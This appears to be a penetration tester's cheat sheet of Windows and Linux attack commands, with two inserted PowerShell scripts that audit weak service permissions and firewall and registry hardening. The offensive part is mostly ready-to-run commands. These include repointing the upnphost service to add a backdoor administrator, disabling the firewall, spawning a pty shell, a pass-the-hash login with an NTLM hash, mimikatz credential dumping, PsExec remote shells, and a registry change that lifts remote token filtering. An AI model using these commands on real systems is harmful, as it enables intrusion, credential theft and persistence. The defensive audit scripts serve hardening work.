file transfer;

Winpriv check:

Local Privilege Escalation Abusing a Misconfigured Service (upnphost):

accesschk.exe -uwcqv "Authenticated Users" /accepteula
accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula

accesschk.exe -ucqv upnphost
sc config upnphost depend= ""
sc config upnphost binpath= "net user testxlab Password1 /add"
sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost
sc start upnphost
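The accesschk check above finds services whose DACL lets Authenticated Users rewrite the service configuration. The following PowerShell audit script is an added example (not part of the original notes) that does the same check from the defender's side, so the weak ACEs can be found and reset before they are abused: it reads each service's security descriptor with `sc.exe sdshow`, parses the SDDL, and reports Allow ACEs that grant SERVICE_CHANGE_CONFIG (`DC`), WRITE_DAC (`WD`), WRITE_OWNER (`WO`) or generic all/write to broad principals (Authenticated Users, Users, Everyone, Interactive, Anonymous). The principal and rights lists are assumptions chosen for this example and can be widened.

```powershell
# Added audit example, not from the original notes. Finds services whose DACL
# grants configuration-changing rights to broad principals. Remediation is to
# reset the service DACL (for example with sc.exe sdset or a GPO), not to
# tolerate the grant.

$broadPrincipals = @('AU', 'BU', 'WD', 'IU', 'AN')   # SDDL aliases: Authenticated Users, Users, Everyone, Interactive, Anonymous (assumed list)
$dangerousRights = @('DC', 'WD', 'WO', 'GA', 'GW')   # SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE

function Get-WeakServiceAces {
    param([string[]]$ServiceNames = (Get-Service | Select-Object -ExpandProperty Name))

    foreach ($svc in $ServiceNames) {
        # sc.exe sdshow prints the service security descriptor in SDDL form on a line starting with "D:".
        $sddl = (& sc.exe sdshow $svc 2>$null | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }

        # Each ACE looks like (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)  ->  type;flags;rights;objGuid;inhGuid;sid
        foreach ($ace in [regex]::Matches($sddl, '\(([^)]*)\)')) {
            $parts = $ace.Groups[1].Value -split ';'
            if ($parts.Count -lt 6 -or $parts[0] -ne 'A') { continue }   # only Allow ACEs (SACL "AU" entries are skipped)
            $rights = $parts[2]
            $sid    = $parts[5]
            if ($broadPrincipals -notcontains $sid) { continue }

            if ($rights -like '0x*') {
                # Rights may be written as a hex access mask instead of two-letter tokens.
                $mask = [Convert]::ToInt64($rights.Substring(2), 16)
                $hits = @()
                if ($mask -band 0x2)     { $hits += 'SERVICE_CHANGE_CONFIG' }
                if ($mask -band 0x40000) { $hits += 'WRITE_DAC' }
                if ($mask -band 0x80000) { $hits += 'WRITE_OWNER' }
            }
            else {
                # Token form: two-letter rights concatenated together; split into pairs and compare.
                $tokens = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
                $hits   = $tokens | Where-Object { $dangerousRights -contains $_ }
            }

            if ($hits) {
                [pscustomobject]@{
                    Service   = $svc
                    Principal = $sid
                    Rights    = ($hits -join ',')
                    Ace       = $ace.Value
                }
            }
        }
    }
}

# Report every weak ACE on the host; an empty table means no broad principal can reconfigure a service.
Get-WeakServiceAces | Format-Table -AutoSize
```

Run it in an elevated PowerShell to be sure every service descriptor is readable. Any row it prints is a service that a low-privileged account could repoint, exactly the condition the `sc config ... binpath=` lines above rely on, so each hit should be fixed at the ACL rather than worked around.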

File Transfer via FTP

ftp> binary

ftp> put /root/Downloads/accesschk.exe accesschk.exe


Python Interactive Shell

pty spawn:

python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off

Disable Windows firewall on older Windows versions: netsh firewall set opmode disable


priv esc linux - Hacking Articles (abuse PATH variable)

priv esc - cronjob

priv esc - windows - services - sc


pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE // cmd.exe

Via Sysinternals tools and mimikatz:

  • PtH: obtain the user's NTLM hash (via RDP, MSF, or another method).

mimikatz# privilege::debug 
mimikatz# privilege::minidump FILE.DMP 
mimikatz# sekurlsa::logonpasswords 
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}

Then open a new cmd; from there you can run commands via PsExec.

windows> PsExec.exe \\{IP} cmd

Tip: general usage with a password:

PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd

If you get the error "Couldn't access otherComputer: Access is denied.":

Run the following command on the target system:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
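The two `netsh` firewall commands earlier on this page and the `reg add ... LocalAccountTokenFilterPolicy /d 1` line above both weaken a host setting. The PowerShell check below is an added example (not part of the original notes) that reports whether those settings are in their hardened state: all firewall profiles enabled, and `LocalAccountTokenFilterPolicy` absent or 0 (when it is 1, remote logons with local administrator accounts get a full, unfiltered token, which is what turns the "Access is denied" error above into a working PsExec session). It assumes a Windows 8 / Server 2012 or newer host where `Get-NetFirewallProfile` exists; the function and output field names are chosen for this example.

```powershell
# Added hardening check, not from the original notes. Reports the state of the
# two settings this page shows being weakened and prints the hardened value.

function Test-FirewallProfiles {
    # Get-NetFirewallProfile exists on Windows 8 / Server 2012 and later (assumption).
    # Enabled is a GpoBoolean (True / False / NotConfigured), so compare as string.
    foreach ($profile in Get-NetFirewallProfile) {
        [pscustomobject]@{
            Setting  = "Firewall profile: $($profile.Name)"
            Value    = [string]$profile.Enabled
            Hardened = ([string]$profile.Enabled -eq 'True')
            Fix      = "Set-NetFirewallProfile -Name $($profile.Name) -Enabled True"
        }
    }
}

function Test-TokenFilterPolicy {
    $key  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $name = 'LocalAccountTokenFilterPolicy'
    # Missing value means the default (0): remote local-admin logons get a filtered token.
    $item  = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
    $value = if ($null -ne $item) { $item.$name } else { $null }

    $display = if ($null -eq $value) { '(not set, default 0)' } else { [string]$value }
    [pscustomobject]@{
        Setting  = $name
        Value    = $display
        Hardened = ($null -eq $value -or $value -eq 0)
        Fix      = "Remove-ItemProperty -Path '$key' -Name $name"
    }
}

function Test-HostHardening {
    @(Test-FirewallProfiles) + @(Test-TokenFilterPolicy)
}

# Rows with Hardened = False are the ones the commands on this page would have produced.
Test-HostHardening | Format-Table -AutoSize
```

The `Fix` column restores the default for each weakened row. Run the check after an incident on a host where these commands were observed, and alongside it review Security event 4657 (registry value modified) for the `Policies\System` key and the firewall profile change events, since both commands leave a change in the audit trail when object auditing is enabled.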
